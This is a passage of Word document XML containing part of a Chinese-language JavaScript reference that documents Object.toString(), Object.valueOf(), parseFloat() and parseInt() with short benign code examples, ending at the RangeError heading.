      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>注意，这个判断未知对象的技术只适用于内置对象。自定义的对象类有一个</w:t>
      </w:r>
      <w:r>
        <w:t>"Object"</w:t>
      </w:r>
      <w:r>
        <w:t>类，在这种情况下，可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>Object.constructor</w:t>
      </w:r>
      <w:r>
        <w:t>属性来获得关于这个对象的更多信息。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在调试</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序时，</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法可能会非常有用，可以用它输出对象并查看它们的值。因此，为所创建的每个对象定义一个</w:t>
      </w:r>
      <w:r>
        <w:t>toString(</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>方法是个不错的主意。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>虽然</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法通常由系统自动调用，但有时也需要手动调用它们。比如，有时需要将某个对象显式转化为字符串，但</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>没有自动做这个转换时：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>y=Math.sqrt(x);//</w:t>
      </w:r>
      <w:r>
        <w:t>计算一个数字</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>ystr=y.toString();//</w:t>
      </w:r>
      <w:r>
        <w:t>将它转化为一个字符串</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意，在这个例子中，数字有一个可用于强制转换的内置</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>其他情况下，即使在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>会自动转换的上下文中，也可以选择使用</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>。显式地使用</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>有助于使</w:t>
      </w:r>
      <w:r>
        <w:t>代码更加清晰：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>alert(my_obj.toString());</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Object.constructor</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Object.toLocaleString()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Object.valueOf()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="740" w:name="Object_valueOf__"/>
      <w:r>
        <w:t>Object.valueOf()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="740"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>给定对象的原始值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>object.valueOf()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>与指定对象关联的原始值，如果存在这样一个值的话。如果没有与该对象关联的值，则返回对象本身。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>valueOf()</w:t>
      </w:r>
      <w:r>
        <w:t>方法返回与该对象关联的原始值，如果存在这样一个值的话。类型为</w:t>
      </w:r>
      <w:r>
        <w:t>Object</w:t>
      </w:r>
      <w:r>
        <w:t>的对象没有原始值，这个方法只是简单地返回该对象本身。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>不过，对类型为</w:t>
      </w:r>
      <w:r>
        <w:t>Number</w:t>
      </w:r>
      <w:r>
        <w:t>的对象而言，</w:t>
      </w:r>
      <w:r>
        <w:t>valueOf()</w:t>
      </w:r>
      <w:r>
        <w:t>将返回该对象表示的原始数字值。类似地，</w:t>
      </w:r>
      <w:r>
        <w:t>Boolean</w:t>
      </w:r>
      <w:r>
        <w:t>对象会返回一个关联的原始布尔值，</w:t>
      </w:r>
      <w:r>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:t>对象则返回一个关联的字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>valueOf()</w:t>
      </w:r>
      <w:r>
        <w:t>方法很少需要手动调用，在需要原始值时，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>会自动调用这个方法。事实上，由于有对</w:t>
      </w:r>
      <w:r>
        <w:t>valueOf()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的自动调用，甚至很难区分原始值和它们的关联对象</w:t>
      </w:r>
      <w:r>
        <w:t>。例如，虽然</w:t>
      </w:r>
      <w:r>
        <w:t>typeof</w:t>
      </w:r>
      <w:r>
        <w:t>操作符能告诉你字符串和</w:t>
      </w:r>
      <w:r>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:t>对象之间的不同，但在实际应用的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码中两者完全可以等价。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Number</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Boolean</w:t>
      </w:r>
      <w:r>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>valueOf()</w:t>
      </w:r>
      <w:r>
        <w:t>方法将这些包装对象转化为它们所表示的原始值。传入数字、布尔值、字符串到</w:t>
      </w:r>
      <w:r>
        <w:t>Object()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数时则进行相反的操作：它将原始值包装到一个合适的对象包装中。在绝大多数情况下，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>会自动处理这种原始值到对象的转换，所以很少需要这样调用</w:t>
      </w:r>
      <w:r>
        <w:t>Object()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在有些情况下，你可能想为自己的对象自定</w:t>
      </w:r>
      <w:r>
        <w:t>义一个</w:t>
      </w:r>
      <w:r>
        <w:t>valueOf()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。例如，你可能需要定义一个</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>对象来表示复数（一个实数加上一个虚数）。作为这个对象类型的一部分，你可能需要定义执行加法、乘法等的方法（参阅例</w:t>
      </w:r>
      <w:r>
        <w:t>9-3</w:t>
      </w:r>
      <w:r>
        <w:t>）。但你可能也想丢弃复数的虚部以便像普通实数一样处理它们。为了实现这些功能，你可能需要写类似下面的代码：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Complex.prototype.valueOf=new Function("return this.real");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>Complex</w:t>
      </w:r>
      <w:r>
        <w:t>对象类型定义这个</w:t>
      </w:r>
      <w:r>
        <w:t>valueOf()</w:t>
      </w:r>
      <w:r>
        <w:t>方法后，就可以，例如，将一个复数对象传入</w:t>
      </w:r>
      <w:r>
        <w:t>M</w:t>
      </w:r>
      <w:r>
        <w:t>ath.sqrt()</w:t>
      </w:r>
      <w:r>
        <w:t>，以便计算这个复数的实部的平方根。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参阅</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Object.toString()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="741" w:name="parseFloat__"/>
      <w:r>
        <w:t>parseFloat()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="741"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将一个字符串转为数字</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>parseFloat(s)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>s</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>待解析并转化为数字的字符串。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解析后的数字，如果</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>不是以一个有效数字开头则返回</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
      <w:r>
        <w:t>。在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript 1.0</w:t>
      </w:r>
      <w:r>
        <w:t>中，如果</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>不能解析为数字则返回</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>而不是</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</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parseFloat()</w:t>
      </w:r>
      <w:r>
        <w:t>解析并返回</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>中出现的第一个数字。当</w:t>
      </w:r>
      <w:r>
        <w:t>parseFloat()</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>中遇到一个不是该数字的有效部分的字符时，解析将终止，返回获得</w:t>
      </w:r>
      <w:r>
        <w:t>的值。如果</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>不是以</w:t>
      </w:r>
      <w:r>
        <w:t>parseFloat()</w:t>
      </w:r>
      <w:r>
        <w:t>能解析的一个数字开头，则函数将返回非数字值</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
      <w:r>
        <w:t>。可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>isNaN()</w:t>
      </w:r>
      <w:r>
        <w:t>函数来测试返回值。如果只想解析数字的整数部分，可使用</w:t>
      </w:r>
      <w:r>
        <w:t>parseInt()</w:t>
      </w:r>
      <w:r>
        <w:t>代替</w:t>
      </w:r>
      <w:r>
        <w:t>parseFloat()</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isNaN()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>parseInt()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="742" w:name="parseInt__"/>
      <w:r>
        <w:t>parseInt()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="742"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将一个字符串转换为整数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>parseInt(s)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>parseInt(s,radix)</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s</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>要解析的字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>radix</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个可选的整数参数，表示该数字将解析到的进制。如果这个参数省略或值为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>，则该数字将解析为十进制，如果它以</w:t>
      </w:r>
      <w:r>
        <w:t>0x</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>0X</w:t>
      </w:r>
      <w:r>
        <w:t>开头则将解析为十六进制。如果这个参数小于</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>或大于</w:t>
      </w:r>
      <w:r>
        <w:t>36</w:t>
      </w:r>
      <w:r>
        <w:t>，则</w:t>
      </w:r>
      <w:r>
        <w:t>parseInt()</w:t>
      </w:r>
      <w:r>
        <w:t>将返回</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>解析过的数字，如果</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>不以一个有效的整数开头则返回</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
      <w:r>
        <w:t>。在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript 1.0</w:t>
      </w:r>
      <w:r>
        <w:t>中，</w:t>
      </w:r>
      <w:r>
        <w:t>parseInt()</w:t>
      </w:r>
      <w:r>
        <w:t>在不能解析</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>时返回</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>而不是</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</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parseInt()</w:t>
      </w:r>
      <w:r>
        <w:t>解析并返回</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>中出现的第一个数字（可以以一个减号开头）。当</w:t>
      </w:r>
      <w:r>
        <w:t>parseInt()</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>中遇到一个不是指定的进制的有效数字的字符时，解析</w:t>
      </w:r>
      <w:r>
        <w:t>将终止，同时返回得到的值。如果</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>不是以</w:t>
      </w:r>
      <w:r>
        <w:t>parseInt()</w:t>
      </w:r>
      <w:r>
        <w:t>能解析的一个字符开头，则本函数将返回非数字值</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
      <w:r>
        <w:t>。可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>isNaN()</w:t>
      </w:r>
      <w:r>
        <w:t>函数来测试返回的值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>radix</w:t>
      </w:r>
      <w:r>
        <w:t>参数指定要使用的进制。使用</w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t>将让</w:t>
      </w:r>
      <w:r>
        <w:t>parseInt()</w:t>
      </w:r>
      <w:r>
        <w:t>解析十进制数；值</w:t>
      </w:r>
      <w:r>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t>则指定解析一个八进制数（使用数字</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:t>）；值</w:t>
      </w:r>
      <w:r>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:t>则指定一个十六进制的值，使用数字</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:t>以及字母</w:t>
      </w:r>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>F</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>radix</w:t>
      </w:r>
      <w:r>
        <w:t>可以是</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>36</w:t>
      </w:r>
      <w:r>
        <w:t>之间的任意值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>radix</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>或未指定，则</w:t>
      </w:r>
      <w:r>
        <w:t>parseInt()</w:t>
      </w:r>
      <w:r>
        <w:t>将尝试判断自</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>解析出的数字的进制。如果</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>以</w:t>
      </w:r>
      <w:r>
        <w:t>0x</w:t>
      </w:r>
      <w:r>
        <w:t>开头（之前可以有一个减号），则</w:t>
      </w:r>
      <w:r>
        <w:t>pars</w:t>
      </w:r>
      <w:r>
        <w:t>eInt()</w:t>
      </w:r>
      <w:r>
        <w:t>将把</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>剩余的部分解析为一个十六进制数。在其他情况下，</w:t>
      </w:r>
      <w:r>
        <w:t>parseInt()</w:t>
      </w:r>
      <w:r>
        <w:t>将把</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>解析为一个十进制数。</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parseInt("19",10);//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>19(10+9)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>parseInt("11",2);//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>3(2+1)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>parseInt("17",8);//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>15(8+7)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>parseInt("1f",16);//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>31(16+15)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>parseInt("10");//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>parseInt("0x10");//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>16</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isNaN()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>parseFloat()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="743" w:name="RangeError"/>
      <w:r>
        <w:t>RangeError</w:t>
      </w:r>
      <w:bookmarkEnd w:id="743"/>
    </w:p>
